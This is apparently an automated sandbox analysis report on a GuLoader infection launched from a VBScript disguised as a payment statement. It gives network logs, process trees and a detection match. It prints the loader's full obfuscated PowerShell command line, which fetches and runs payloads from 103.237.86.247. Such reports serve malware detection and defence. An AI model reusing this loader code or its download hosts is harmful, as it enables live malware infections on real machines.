                Jul 5, 2024 07:12:57.217273951 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5b7 | No error (0) | bg.microsoft.map.fastly.net | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                Jul 5, 2024 07:12:57.217273951 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5b7 | No error (0) | bg.microsoft.map.fastly.net | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                Jul 5, 2024 07:13:44.510143995 CEST | 1.1.1.1 | 192.168.2.5 | 0xc6d8 | No error (0) | geoplugin.net | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                • 103.237.86.247
                • geoplugin.net
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49705 | 103.237.86.247 | 80 | 3528 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 5, 2024 07:13:00.158648014 CEST | 170 | OUT | GET /acidizes.mso HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 103.237.86.247
                Connection: Keep-Alive
                Jul 5, 2024 07:13:01.116761923 CEST | 1236 | IN | HTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Thu, 04 Jul 2024 09:49:17 GMT
                Accept-Ranges: bytes
                ETag: "6786e76ff7cdda1:0"
                Server: Microsoft-IIS/8.5
                Date: Fri, 05 Jul 2024 05:13:00 GMT
                Content-Length: 491856


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.5 | 64544 | 103.237.86.247 | 80 | 5652 | C:\Program Files (x86)\Windows Mail\wab.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 5, 2024 07:13:36.138626099 CEST | 173 | OUT | GET /mtyozjDM72.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 103.237.86.247
                Cache-Control: no-cache
                Jul 5, 2024 07:13:37.124567032 CEST | 1236 | IN | HTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Thu, 04 Jul 2024 09:45:36 GMT
                Accept-Ranges: bytes
                ETag: "36ed6ebf6cdda1:0"
                Server: Microsoft-IIS/8.5
                Date: Fri, 05 Jul 2024 05:13:36 GMT
                Content-Length: 494656
                Data Raw: c5 d1 00 6c a6 f7 1e 30 06 00 77 90 33 da 9c c5 82 58 ba 68 b3 a7 6d 37 c4 87 60 85 20 1d d4 a7 29 f1 4d 2e 6a 33 d9 e0 b0 fc 6a f2 e9 54 1d 8c 0d 6a c4 72 eb 7a 9d 13 3d 86 75 01 32 18 b6 2f e6 28 cc 6b 97 bf 33 a9 95 df 62 34 0d ef 0a a8 c2 26 c8 a5 41 59 05 87 46 e5 8e e1 69 73 30 66 94 57 2e 79 e1 1b 15 bd 68 4f df 1b 01 b6 7c 63 e9 29 71 63 e1 bf 6a ad eb fc 12 cd c1 53 d2 98 c3 20 13 8e 35 f5 25 9b a2 5f f8 57 bd ec bd 60 a9 08 04 28 14 d9 e8 66 6a 07 a2 ec 62 17 0a 8e 10 1d cc b0 5e 20 92 68 eb 96 cf 86 a9 fb 47 fa 1d 74 cd 10 af a5 09 9f 1d 78 2b da 9f 28 83 3c 21 c5 fb d3 29 9e e5 da 05 85 c8 50 76 18 be 54 07 b5 6c e7 43 dd 4a 93 c4 0d ee 37 14 c4 2b 88 b8 32 c7 88 9c 3a 8d 91 8b 46 81 c7 13 5b 4c eb d7 73 46 e0 67 e7 54 4b 4b d4 87 69 32 8d a3 e9 ed 37 6b 35 5c 1c ba 49 fa e4 58 c2 f0 50 68 cf f4 aa 7c d4 cb f9 27 86 38 51 b9 c7 59 38 f0 67 48 d3 45 4f 58 5e 73 ed cb 32 4d 37 a7 62 e5 1c 95 7c 20 6d 64 34 c5 58 f2 1c cd b5 29 c9 d5 ee b0 d2 81 61 1b 6f 84 9a f2 f1 09 2f 3a 08 d3 a0 55 0a [TRUNCATED]
                Data Ascii: l0w3Xhm7` )M.j3jTjrz=u2/(k3b4&AYFis0fW.yhO|c)qcjS 5%_W`(fjb^ hGtx+(<!)PvTlCJ7+2:F[LsFgTKKi27k5\IXPh|'8QY8gHEOX^s2M7b| md4X)ao/:U*LHBwu4JR-K4v$*H,lJofyRp?:Vk>+dQ-^}V-JnehI8iMP$<vO*5knMdKmsSwW?;iI?@oe1H,wDL(i9@'uE3%HrKBS!cG7r-;Eh5)6?AAh&p;R7*1Ew^vF*23TI171ls,&0v#Y5fvq&,?kMMY>{tp!w\tCx|`^/x+-7Jz?6/bz4"??n-0_4 G iifv|`AM`q.v?PcR;En&yAAoBE1>=8"`8*"9V~km2AJtSgm`zo]JFAQ)'RkF=^?%
                Jul 5, 2024 07:13:37.124718904 CEST1236INData Raw: 74 e5 a6 d8 22 56 2f 7d ab bb 5e e9 36 fd 4d e6 2d 10 70 d6 8d b5 9e f0 ff 9f 88 3d db b3 32 29 1d 6c bf d3 b3 b3 40 e4 ac 95 24 65 a7 d9 6c 51 a5 44 c8 c4 10 a3 ad 96 38 89 2c c9 51 5f bc 6f 8e eb 49 25 76 1b ce 8a 24 db 93 34 40 96 f4 8a e7 40
                Data Ascii: t"V/}^6M-p=2)l@$elQD8,Q_oI%v$4@@#]Bxi5LM:~5hJH<S,Y~^S65'U)W7mef^@$n"ZO|x'LS94SS'32.?
                Jul 5, 2024 07:13:37.124732971 CEST1236INData Raw: 72 8b c5 79 dd 14 f4 08 69 03 cf c7 7a a0 c6 b1 21 1c 89 26 30 4e 91 c9 47 02 dd 1e 93 8c 66 cb 97 cc d5 cd a6 04 59 42 fb fc d1 ea 13 e2 f5 c6 70 06 18 13 8d ab f5 43 5f 84 4c f2 cd f9 f1 f8 be 01 e3 c7 47 42 c0 d2 da f7 6e b9 42 8d ae 65 be a1
                Data Ascii: ryiz!&0NGfYBpC_LGBnBe :/xChmcy.PtWTCI{Jrhzn.E-P4%ehi8$[n?]||M6&:Mng&Invyx#b@25cf
                Jul 5, 2024 07:13:37.124926090 CEST1236INData Raw: a4 ff 18 e4 1b eb 6d 72 98 30 62 82 9e e2 12 2d 97 9b f6 2d f9 8a 5d 61 33 00 78 16 c7 81 61 42 e4 54 17 be d5 6d c7 11 1d d3 a0 5c c4 d2 41 2a c6 03 a0 47 59 d7 92 1b fc 47 f8 78 6e 7e 4f 4f d7 15 fe b7 b7 c8 ee 21 52 9b 6d 2c 1d 4a a1 20 c9 62
                Data Ascii: mr0b--]a3xaBTm\A*GYGxn~OO!Rm,J be- f%5(5<VO'[QzVV%~5IflI5T('iM<uvO ?^,n&g1E*J<LiOyw^V}/'TFK5y4$hbRF'
                Jul 5, 2024 07:13:37.125077009 CEST896INData Raw: 53 2f 70 e1 ad 75 08 d2 64 11 ee b2 97 98 42 86 40 0c b0 2f 52 f6 86 b9 eb 30 8e 64 ce 31 79 c6 58 da 78 52 93 4e 58 cf 33 6a ce bd be b8 88 70 bb 06 21 dd 8f cb 48 e9 57 d9 77 64 d4 48 55 44 79 49 f2 80 38 4e 0a ee 19 5d 28 3a f4 fc 15 b2 89 aa
                Data Ascii: S/pudB@/R0d1yXxRNX3jp!HWwdHUDyI8N](:[[,eb5woj-f-3bQ]Yd?w\:d /lW#TAYToDD2yUM)q:jqNbQ1"F2pVS'fdW~tmOti9
                Jul 5, 2024 07:13:37.377682924 CEST1236INData Raw: 64 62 9a a8 63 82 ea e3 a5 0c f9 2d 68 c6 12 b4 b5 90 c0 6e 14 21 99 f2 40 3d 68 93 03 6c b7 f9 92 47 05 70 82 e8 f0 c6 fe aa 44 41 ae e4 2f cb 56 31 5c 9c 3e 89 35 c5 3a 50 c0 0a 3a c2 28 fa cb 22 20 a6 92 3e 6c d3 09 fd 5b b7 e2 6e 35 33 e6 1a
                Data Ascii: dbc-hn!@=hlGpDA/V1\>5:P:(" >l[n53^/Ot"m?Y @M6I"TN*-Lel0Z?f^{tw'x!m2kPBF{N</,M6; ,!YSc0{<N
                Jul 5, 2024 07:13:37.377696991 CEST1236INData Raw: 43 3d 86 b4 81 80 1c 68 f1 3f 45 69 35 6f 10 cb 4c 03 da 91 d5 56 d4 f9 ee d9 94 87 af ec d5 14 04 eb 19 b1 bf b3 d7 9b a6 13 eb b4 8f 1c 86 5c 19 f2 c6 be 43 af 5e 32 da 31 18 6c 01 68 b4 1f c1 97 9a cf dd 77 ca cd 2b 8d 05 dd b0 cc a4 35 3a 46
                Data Ascii: C=h?Ei5oLV\C^21lhw+5:FN[5pI#z4~<u>zvF@OwR#8bni6,"/&v<I.(p?vHE&9{-AxD4\ph[t-,wy?3
                Jul 5, 2024 07:13:37.377707005 CEST448INData Raw: 81 6c 0a 98 15 31 e9 85 86 7a 74 d3 a9 5e 35 e2 f4 95 09 47 eb 9c 66 e1 64 b4 eb 39 fd 1f 1b f9 20 c7 28 c3 1d 3f 51 d2 f9 5e a1 b3 c4 54 06 d5 69 f3 66 32 77 bb 75 c3 d2 d5 88 16 df 66 30 a4 c4 3a f1 e9 7b 1e 6a 2a fb d3 f0 0e 33 67 9f 2e bb 26
                Data Ascii: l1zt^5Gfd9 (?Q^Tif2wuf0:{j*3g.&4pC}1\kE[vojy[1pFhFD6a9lUB<j!UT=Q%'Pl0b1&%doOYpdSXEX!IB?zqh^J8%<q+]1bH&
                Jul 5, 2024 07:13:37.377796888 CEST1236INData Raw: 51 01 35 b4 1e ad 83 51 c1 68 fd 2f d5 fa 6b 4e 4a 2b 06 f4 41 6c d9 ff 60 f5 15 2a 31 9c b4 a9 93 80 8b a1 3a 4e cf 2f 33 cb 81 b0 66 17 cb 63 44 52 c9 14 94 16 01 d9 df 84 99 8c 0c 45 0d 79 25 27 f7 08 b9 85 9a 68 66 1b c7 59 75 10 31 7d 75 2b
                Data Ascii: Q5Qh/kNJ+Al`*1:N/3fcDREy%'hfYu1}u+OZ%|$TbC7\%Y9&7QKz,Ylz+%Z7Sg2f<^!K7r[1n\-@v4(G=kMdYLmf<LvhuVeRY
                Jul 5, 2024 07:13:37.377810001 CEST1236INData Raw: c5 d0 b9 0a 2c dc 9d 51 a4 19 92 c5 83 80 35 ae 20 dc 53 9c fc b8 c7 e0 9d 4a b5 d1 b6 e2 7a 17 a8 00 bc 9a aa ed 3a 7b c0 92 ab 9a 03 79 3e 2e 20 88 e4 ee d3 25 73 48 1d 99 cf 00 80 b6 c2 dc 51 65 49 ee 5a 38 62 3c 27 83 36 25 45 e1 ce d1 96 51
                Data Ascii: ,Q5 SJz:{y>. %sHQeIZ8b<'6%EQ"8c+:b,vjLLBQ0 SO,EK| BeI.F4"PV:GY-VA6;} 0nIFn+}@y@4;nC9N&S'3"kriu}
                Jul 5, 2024 07:13:37.377902031 CEST1236INData Raw: 9b d4 65 42 0f 3c ef d4 20 d7 82 5d a8 3c 64 cf 84 ea a1 bc 8a 39 4f 1f a4 a2 c9 72 6d 16 32 d1 de d9 dc 04 fd a3 6e 50 db e3 f6 3b aa 74 6f d2 6d 1c e4 af f3 b4 dc e0 78 e0 ba 07 44 ec 40 34 15 f1 6b 2a 61 dd a2 a5 43 6c 3a 80 ec f3 ec 30 b6 3c
                Data Ascii: eB< ]<d9Orm2nP;tomxD@4k*aCl:0<r#R|0w|"::Z('a]$.e&S'9N]mVkzL'M1t/ErCdqr\k4_7WRPoDq|IHEd8q1!i


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.5 | 64547 | 178.237.33.50 | 80 | 5652 | C:\Program Files (x86)\Windows Mail\wab.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 5, 2024 07:13:44.517435074 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
                Jul 5, 2024 07:13:45.140240908 CEST | 1170 | IN | HTTP/1.1 200 OK
                date: Fri, 05 Jul 2024 05:13:45 GMT
                server: Apache
                content-length: 962
                content-type: application/json; charset=utf-8
                cache-control: public, max-age=300
                access-control-allow-origin: *
                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                Target ID:0
                Start time:01:12:56
                Start date:05/07/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
                Imagebase:0x7ff6d36e0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:01:12:57
                Start date:05/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. 
retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno 
NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng 
LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker 
EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;"
                Imagebase:0x7ff7be880000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:01:12:57
                Start date:05/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:01:12:59
                Start date:05/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Imagebase:0x7ff6d12e0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:01:13:07
                Start date:05/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib 